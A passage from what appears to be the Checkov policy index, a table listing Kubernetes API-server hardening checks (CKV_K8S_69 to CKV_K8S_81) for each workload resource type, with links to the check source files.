2981 | CKV_K8S_69 | resource | Pod | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2982 | CKV_K8S_69 | resource | PodTemplate | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2983 | CKV_K8S_69 | resource | ReplicaSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2984 | CKV_K8S_69 | resource | ReplicationController | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2985 | CKV_K8S_69 | resource | StatefulSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | +| 2986 | CKV_K8S_70 | resource | CronJob | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2987 | CKV_K8S_70 | resource | DaemonSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2988 | CKV_K8S_70 | resource | Deployment | Ensure that the --token-auth-file argument is not set | Kubernetes | 
[ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2989 | CKV_K8S_70 | resource | DeploymentConfig | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2990 | CKV_K8S_70 | resource | Job | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2991 | CKV_K8S_70 | resource | Pod | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2992 | CKV_K8S_70 | resource | PodTemplate | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2993 | CKV_K8S_70 | resource | ReplicaSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2994 | CKV_K8S_70 | resource | ReplicationController | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2995 | CKV_K8S_70 | resource | StatefulSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | +| 2996 | 
CKV_K8S_71 | resource | CronJob | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 2997 | CKV_K8S_71 | resource | DaemonSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 2998 | CKV_K8S_71 | resource | Deployment | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 2999 | CKV_K8S_71 | resource | DeploymentConfig | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3000 | CKV_K8S_71 | resource | Job | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3001 | CKV_K8S_71 | resource | Pod | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3002 | CKV_K8S_71 | resource | PodTemplate | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3003 | CKV_K8S_71 | resource | ReplicaSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | 
[ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3004 | CKV_K8S_71 | resource | ReplicationController | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3005 | CKV_K8S_71 | resource | StatefulSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | +| 3006 | CKV_K8S_72 | resource | CronJob | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3007 | CKV_K8S_72 | resource | DaemonSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3008 | CKV_K8S_72 | resource | Deployment | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3009 | CKV_K8S_72 | resource | DeploymentConfig | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | 
[ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3010 | CKV_K8S_72 | resource | Job | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3011 | CKV_K8S_72 | resource | Pod | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3012 | CKV_K8S_72 | resource | PodTemplate | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3013 | CKV_K8S_72 | resource | ReplicaSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3014 | CKV_K8S_72 | resource | ReplicationController | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3015 | CKV_K8S_72 | resource | StatefulSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | 
[ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | +| 3016 | CKV_K8S_73 | resource | CronJob | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3017 | CKV_K8S_73 | resource | DaemonSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3018 | CKV_K8S_73 | resource | Deployment | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3019 | CKV_K8S_73 | resource | DeploymentConfig | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3020 | CKV_K8S_73 | resource | Job | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3021 | CKV_K8S_73 | resource | Pod | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | 
[ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3022 | CKV_K8S_73 | resource | PodTemplate | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3023 | CKV_K8S_73 | resource | ReplicaSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3024 | CKV_K8S_73 | resource | ReplicationController | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3025 | CKV_K8S_73 | resource | StatefulSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | +| 3026 | CKV_K8S_74 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3027 | CKV_K8S_74 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3028 | CKV_K8S_74 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3029 | CKV_K8S_74 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3030 | CKV_K8S_74 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3031 | CKV_K8S_74 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3032 | CKV_K8S_74 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3033 | CKV_K8S_74 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3034 | CKV_K8S_74 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3035 | CKV_K8S_74 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | +| 3036 | CKV_K8S_75 | resource | CronJob | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3037 | CKV_K8S_75 | resource | DaemonSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3038 | CKV_K8S_75 | resource | Deployment | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3039 | CKV_K8S_75 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3040 | CKV_K8S_75 | resource | 
Job | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3041 | CKV_K8S_75 | resource | Pod | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3042 | CKV_K8S_75 | resource | PodTemplate | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3043 | CKV_K8S_75 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3044 | CKV_K8S_75 | resource | ReplicationController | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3045 | CKV_K8S_75 | resource | StatefulSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | +| 3046 | CKV_K8S_77 | resource | CronJob | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3047 | CKV_K8S_77 | resource | DaemonSet | 
Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3048 | CKV_K8S_77 | resource | Deployment | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3049 | CKV_K8S_77 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3050 | CKV_K8S_77 | resource | Job | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3051 | CKV_K8S_77 | resource | Pod | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3052 | CKV_K8S_77 | resource | PodTemplate | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3053 | CKV_K8S_77 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3054 | CKV_K8S_77 | resource | ReplicationController | Ensure 
that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3055 | CKV_K8S_77 | resource | StatefulSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | +| 3056 | CKV_K8S_78 | resource | AdmissionConfiguration | Ensure that the admission control plugin EventRateLimit is set | Kubernetes | [ApiServerAdmissionControlEventRateLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py) | +| 3057 | CKV_K8S_79 | resource | CronJob | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3058 | CKV_K8S_79 | resource | DaemonSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3059 | CKV_K8S_79 | resource | Deployment | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3060 | CKV_K8S_79 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | 
[ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3061 | CKV_K8S_79 | resource | Job | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3062 | CKV_K8S_79 | resource | Pod | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3063 | CKV_K8S_79 | resource | PodTemplate | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3064 | CKV_K8S_79 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3065 | CKV_K8S_79 | resource | ReplicationController | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3066 | CKV_K8S_79 | resource | StatefulSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | +| 3067 | CKV_K8S_80 | 
resource | CronJob | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3068 | CKV_K8S_80 | resource | DaemonSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3069 | CKV_K8S_80 | resource | Deployment | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3070 | CKV_K8S_80 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3071 | CKV_K8S_80 | resource | Job | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3072 | CKV_K8S_80 | resource | Pod | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3073 | CKV_K8S_80 | resource | PodTemplate | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | 
[ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3074 | CKV_K8S_80 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3075 | CKV_K8S_80 | resource | ReplicationController | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3076 | CKV_K8S_80 | resource | StatefulSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | +| 3077 | CKV_K8S_81 | resource | CronJob | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3078 | CKV_K8S_81 | resource | DaemonSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3079 | CKV_K8S_81 | resource | Deployment | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | 
[ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3080 | CKV_K8S_81 | resource | DeploymentConfig | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3081 | CKV_K8S_81 | resource | Job | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3082 | CKV_K8S_81 | resource | Pod | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3083 | CKV_K8S_81 | resource | PodTemplate | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used | Kubernetes | [ApiServerSecurityContextDenyPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurityContextDenyPlugin.py) | +| 3084 | CKV_K8S_81 | resource | ReplicaSet | Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not 